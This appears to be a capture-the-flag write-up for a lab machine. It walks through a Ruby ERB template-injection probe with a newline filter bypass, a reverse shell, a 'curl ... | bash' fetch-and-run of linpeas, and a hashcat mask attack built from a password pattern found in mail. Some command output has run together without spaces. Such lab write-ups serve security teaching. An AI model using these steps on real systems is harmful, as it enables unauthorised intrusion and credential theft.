This in an Ubuntu 22.04 machine running a web site vulnerable to SSTI, which is exploited to get a shell in the system. Regarding escalation, there is a hash in the file system that, after cracking, allows us to get a password for a sudoer user.
According to them, there are 3 Ruby templates: ERB, HAML and Slim, of which ERB seems to be the more common because is the one installed by default. Looking for Ruby ERB SSTI payloads I found these references:
Let's start with the simplest payload which seems to be <%= 7*7 %>. If you enter it in the "Category" column field, a "Malicious input blocked" is reported, meaning an input filter must be in place.
Testing the application we find out it filters non-alphanumeric characters, and turns out the filter can be bypassed adding a %0A (newline) before the payload.
This time the application outputs value "49", so the SSTI vulnerability is confirmed. Start a listener and refer to HackTricks or PayloadsAllTheThings to prepare a reverse shell payload. Remember to URL-encode it before sending.
For example, this payload was confirmed to be working.
A reverse shell for user susan is received on port 1919.
Which can be used to retrieve the user flag.
ROOT
Start from the low-priv reverse shell for user susan. Bearing in mind this is an "easy" box, we assume linpeas.sh will surely help to automatically discover a flaw.
Run it and inspect the results.
> curl http://10.10.xxx.xxx/linpeas.sh |bash
Some interesting facts are revealed. First, cron jobs and Ruby scripts are found in Susan's home.
We could try to exploit the fact susan is a sudoer, but for this we would need to know her clear text password. Let's look for the password in the credentials file.
> cat /var/mail/susanDuetoourtransitiontoJupiterGradesbecauseofthePupilPathdatabreach,Ithoughtweshouldalsomigrateourcredentials ('our'includingtheotherstudentsinourclass) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}Notethatalllettersofthefirstnameshouldbeconveredintolowercase.Pleasehitmewithupdatesonthemigrationwhenyoucan.Iamcurrentlyregisteringouruniversitywiththeplatform.-Tina,yourdelightfulstudent
So we have found the password creation pattern. since we also have the password hash, we are in a position to launch a Hashcat mask attack.
> hashcat -m 1400 hash.txt -a 3 -d 1 susan_nasus_?d?d?d?d?d?d?d?d?d
This returns Susan's password, which we can use to connect to the host via SSH.
From the SSH shell, take the opportunity to enumerate the system.
> uname -a &&cat/etc/os-releaseLinuxperfection5.15.0-97-generic#107-Ubuntu SMP Wed Feb 7 13:26:48 UTC 2024 x86_64 x86_64 x86_64 GNU/LinuxPRETTY_NAME="Ubuntu 22.04.4 LTS"NAME="Ubuntu"VERSION_ID="22.04"VERSION="22.04.4 LTS (Jammy Jellyfish)"VERSION_CODENAME=jammyID=ubuntuID_LIKE=debianHOME_URL="https://www.ubuntu.com/"SUPPORT_URL="https://help.ubuntu.com/"BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"UBUNTU_CODENAME=jammy
Now that we have Susan's password we can enumerate her sudo configuration.
> sudo -l[sudo] password for susan:MatchingDefaultsentriesforsusanonperfection:env_reset,mail_badpass,secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin,use_ptyUsersusanmayrunthefollowingcommandsonperfection: (ALL:ALL) ALL
